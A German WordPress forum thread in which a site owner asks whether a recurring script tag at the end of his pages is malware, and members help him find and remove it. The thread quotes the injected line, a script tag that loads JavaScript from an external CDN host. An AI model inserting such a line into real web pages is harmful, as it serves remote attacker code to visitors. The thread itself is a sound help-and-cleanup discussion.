1. Herzlich willkommen bei WPDE.org, dem grössten und ältesten deutschsprachigen Community-Forum rund um das Thema WordPress. Du musst angemeldet oder registriert sein, um Beiträge verfassen zu können.
    Information ausblenden

Ist das Malware?

Dieses Thema im Forum "Installation" wurde erstellt von zappo, 5. Februar 2019.

Schlagworte:
  1. zappo

    zappo Well-Known Member

    Registriert seit:
    27. Mai 2008
    Beiträge:
    76
    Zustimmungen:
    2
    Guten Tag,
    es geht um folgende Homepage: www.zappo-entertainment.de

    was passiert:
    Immer am ende einer Seite schleicht sich folgender Code ein
    <p><script src="//1046663444.rsc.cdn77.org/1fd3b038f796d0b159.js" async=""></script></p>

    lösche ich ihn, ist er für ein weile weg..und nach einem neustart weider da.

    Ist das Malware?
    Was kann ich tun um es los zu werden.

    Ach ja der Der Google Site Checker es ist keine Malware auf der Homepage.

    Danke vorab für Mühen und sonnige Grüße

    Peter
     
    #1 zappo, 5. Februar 2019
  2. Henk1060

    Henk1060 Well-Known Member

    Registriert seit:
    4. September 2014
    Beiträge:
    3.927
    Zustimmungen:
    349
    hy,

    naja schon etwas seltsam ,)
    der eintrag kommt aus einen widget.
    wolltest du vielleicht einmal kurz vor dem footer mal was ausgeben lassen.

    Wenn du schon schreibst, du löscht es und kommt es wieder.
    Kann fast davon ausgehen das hier evtl. was war.
     
    #2 Henk1060, 5. Februar 2019
  3. b3317133

    b3317133 Well-Known Member

    Registriert seit:
    21. November 2014
    Beiträge:
    11.678
    Zustimmungen:
    1.786
    Ergänzend zu @Henk1060, wenn Du das Script nicht selbst eingefügt hast, ist es als Malware zu betrachten.
     
    #3 b3317133, 5. Februar 2019
  4. zappo

    zappo Well-Known Member

    Registriert seit:
    27. Mai 2008
    Beiträge:
    76
    Zustimmungen:
    2
    Danke schon mal für die Infos. Klasse!
    Ich habe es nicht wissentlich eingefügt - evnetuel ja über ein Plugin.
    Im Kaspersky wird es als bösartiger Link identifiziert.
    Was kann ich jetzt tun um das los zu werden.

    Danke für die Mühen und den Hirnschweiß vorab.

    Grüße
    Peter
     
    #4 zappo, 5. Februar 2019
  5. b3317133

    b3317133 Well-Known Member

    Registriert seit:
    21. November 2014
    Beiträge:
    11.678
    Zustimmungen:
    1.786
    Schau mal im Editor die Startseite an, dort sind drei Bereiche / Panels, im dritten - ansonsten leeren - Bereich befindet sich ein TinyMCE / Text Widget mit diesem Script.
     
    #5 b3317133, 5. Februar 2019
  6. zappo

    zappo Well-Known Member

    Registriert seit:
    27. Mai 2008
    Beiträge:
    76
    Zustimmungen:
    2
    Ganz herzlichen dank für die Informationen.
    Mit dem Sucuri MAlfinder konnte ich das Problem aktuell löschen. Mal schauen ob es anhält.

    Danke

    Peter
     
    #6 zappo, 7. Februar 2019
  7. b3317133

    b3317133 Well-Known Member

    Registriert seit:
    21. November 2014
    Beiträge:
    11.678
    Zustimmungen:
    1.786
    Wenn Du nicht genau weisst, wo das Script herkam, ist der Website als kompromitiert zu betrachten, solange die Herkunft nicht geklärt und das Einfallstor geschlossen ist.

    Was ist mit "Sucuri MAlfinder" gemeint? Das Sucuri Security Plugin für WordPress? Die Remove Website Malware Dienstleistung von Sucuri?
     
    #7 b3317133, 7. Februar 2019
  8. zappo

    zappo Well-Known Member

    Registriert seit:
    27. Mai 2008
    Beiträge:
    76
    Zustimmungen:
    2
    Danke für den Hinweis. Klasse!
    Ich habe auch jemand gefunden der danach schaut. Besser ist das!
    Ja es ist das Sucuri Security Plugin für WordPress? Kostenfreie Version.

    Sonnige Grüße

    Peter
     
    #8 zappo, 7. Februar 2019
  9. Tüddeldraht

    Tüddeldraht Well-Known Member

    Registriert seit:
    7. März 2013
    Beiträge:
    86
    Zustimmungen:
    5
    Hilfreich ist auch in solchen Fällen der Artikel "Hilfe! Mein WordPress hat einen Virus! Wie mache ich den weg?" von Ernesto Ruge.

    Hatte damals auch eine Seite die immer angegriffen wurde, nach eifriger Analyse habe ich herausgefunden, dass dort ein Plugin Schwierigkeiten machte. Dadurch konnte der Angreifer ein scheinbares Plugin hochladen (mit harmlosen Namen) und so konnte er den Schadcode einfügen.

    Nach einem Tag Arbeit war dann aber alles erledigt und die Seite lief wieder. Keine weiteren (erfolgreichen) Angriffe.
     
    #9 Tüddeldraht, 12. Februar 2019
(Du musst angemeldet oder registriert sein, um Beiträge verfassen zu können. )
  1. Diese Seite verwendet Cookies, um Inhalte zu personalisieren, diese deiner Erfahrung anzupassen und dich nach der Registrierung angemeldet zu halten.
    Wenn du dich weiterhin auf dieser Seite aufhältst, akzeptierst du unseren Einsatz von Cookies.
    Akzeptieren Weitere Informationen...
    Information ausblenden
  1. Diese Seite verwendet Cookies, um Inhalte zu personalisieren, diese deiner Erfahrung anzupassen und dich nach der Registrierung angemeldet zu halten.
    Wenn du dich weiterhin auf dieser Seite aufhältst, akzeptierst du unseren Einsatz von Cookies.
    Akzeptieren Weitere Informationen...
    Information ausblenden